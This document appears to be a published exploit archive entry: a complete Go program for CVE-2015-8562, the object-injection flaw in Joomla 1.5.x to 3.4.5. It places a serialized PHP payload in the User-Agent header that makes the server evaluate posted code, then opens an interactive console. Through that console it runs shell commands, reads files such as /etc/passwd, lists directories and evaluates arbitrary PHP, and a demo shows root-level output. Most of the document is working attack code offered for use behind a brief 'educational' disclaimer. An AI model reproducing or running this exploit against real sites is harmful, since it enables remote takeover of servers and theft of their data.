Joomla 1.5.x to 3.4.5 Object Injection Exploit :: 2015-12-31
package main
/*
**************************************************************************
* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit
* Exploit Author: Khashayar Fereidani ( http://fereidani.com )
* Version: 1.5.x to 3.4.5
* CVE : CVE-2015-8562
**************************************************************************
* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE
* IS ON YOUR OWN RESPONSIBILITY
**************************************************************************
* How to run : (you need golang compiler from golang.org)
* go run exploit.go http://target/path
* or
* go build exploit.go
* ./exploit http://target/path
**************************************************************************
* DEMO :
$ ./exploit 192.168.1.113/joomla
###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.x to 3.4.5
###############################################
Attacking to http://FILTERED.TLD/joomla/
Target is vulnerable !
# Command Line Documentation :
read FILEPATH read file from FILEPATH
dir DIRPATH list directory in DIRPATH
exec COMMAND execute system command
eval phpcode evaluate PHP Code
help display this help
exit close exploit console
[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')
root@joomla:$ exec uname -a
Linux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
root@joomla:$
*/
import (
"fmt"
"net/http"
"regexp"
"os"
"io/ioutil"
"bytes"
"net/http/cookiejar"
"net/url"
"bufio"
"strings"
)
var target string;
var helpString=`# Command Line Documentation :
read FILEPATH read file from FILEPATH
dir DIRPATH list directory in DIRPATH
exec COMMAND execute system command
eval phpcode evaluate PHP Code
help display this help
exit close exploit console
[*] Examples:
read /etc/passwd
dir /etc/
exec ls -lah
eval include('/etc/passwd')
`
var validHttpUrl=regexp.MustCompile("^http[s]{0,1}://")
var resultRegex=regexp.MustCompile("(?sm)iMH3r3=(.*)")
var cmdRegex=regexp.MustCompile("(\\w+)\\s(.+)")
var newLine=regexp.MustCompile("[\\n\\r]")
var client *http.Client
func newRequest(command string) *http.Request{
values:=url.Values{}
values.Set("1","echo('iMH3r3=');"+command+";")
req,err:=http.NewRequest("POST",target,bytes.NewBufferString(values.Encode()))
if err!=nil{
panic(err)
}
req.Header.Set("User-Agent",`123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:43:"eval($_POST[1]);JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}`+"\xf0\xfd\xfd\xfd")
req.Header.Add("Content-Type", "application/x-www-form-urlencoded")
return req
}
func escape(str string) string{
return strings.Replace(str,"'","\\'",-1)
}
func runCommand(command string){
res,err:=client.Do(newRequest(command))
if err!=nil{
fmt.Println(err.Error())
}else{
defer res.Body.Close()
resBytes,err:=ioutil.ReadAll(res.Body)
str:=string(resBytes)
if err!=nil{
fmt.Println(err)
}
match:=resultRegex.FindStringSubmatch(str)
if len(match)>0{
fmt.Print(match[0][7:])
}
}
}
func confirm() bool{
res,err:=client.Do(newRequest(""))
if err!=nil{
fmt.Println(err)
return false
}else{
if res.StatusCode==500{
fmt.Println("Patched PHP Version :( !")
return false
}
defer res.Body.Close()
resBytes,err:=ioutil.ReadAll(res.Body)
str:=string(resBytes)
if err!=nil{
fmt.Println(err)
}
match:=resultRegex.FindStringSubmatch(str)
if len(match)>0{
return true
}else{
return false
}
}
}
func main(){
fmt.Print(`###############################################
# Joomla Remote Command Execution 0day Exploit
# Exploited by: Khashayar Fereidani
# http://fereidani.com
# Vulnerable Versions: 1.5.0 to 3.4.5
###############################################
`)
options := cookiejar.Options{}
jar, err := cookiejar.New(&options)
if err != nil {
panic(err)
}
client = &http.Client{
Jar:jar,
}
if len(os.Args)<2{
fmt.Println("Insufficient input , please run ./exploit http://targeturl/path/")
return
}
target=os.Args[1]
if(!validHttpUrl.MatchString(target)){
target="http://"+target
}
if string(target[len(target)-1])!="/"{
target+="/"
}
fmt.Println("Attacking to ",target)
res,err:=client.Do(newRequest(""))
if err!=nil{
fmt.Println("Request Error:",err)
return
}
ioutil.ReadAll(res.Body)
res.Body.Close()
if confirm(){
fmt.Println("Target is vulnerable !")
//runCommand("system('ls -la')")
stdinreader := bufio.NewReader(os.Stdin)
fmt.Println(helpString)
for {
var line string
fmt.Print("root@joomla:$ ")
line,_=stdinreader.ReadString('\n')
line=newLine.ReplaceAllString(line,"")
match:=cmdRegex.FindStringSubmatch(line)
if len(match)<3 {
if (line=="exit"){
return
}
if !(line=="help"){
fmt.Println("Wrong input !")
}
fmt.Println(helpString)
}else{
cmd:=match[1]
input:=escape(match[2])
switch cmd {
case "exec":
runCommand("system('"+input+"')")
case "read":
runCommand("readfile('"+input+"')")
case "dir":
runCommand("$a=scandir('"+input+"');foreach($a as $v){echo $v.\"\\n\";}")
case "eval":
runCommand(match[2])
}
}
}
}else{
fmt.Println("Target is not vulnerable!")
}
}Download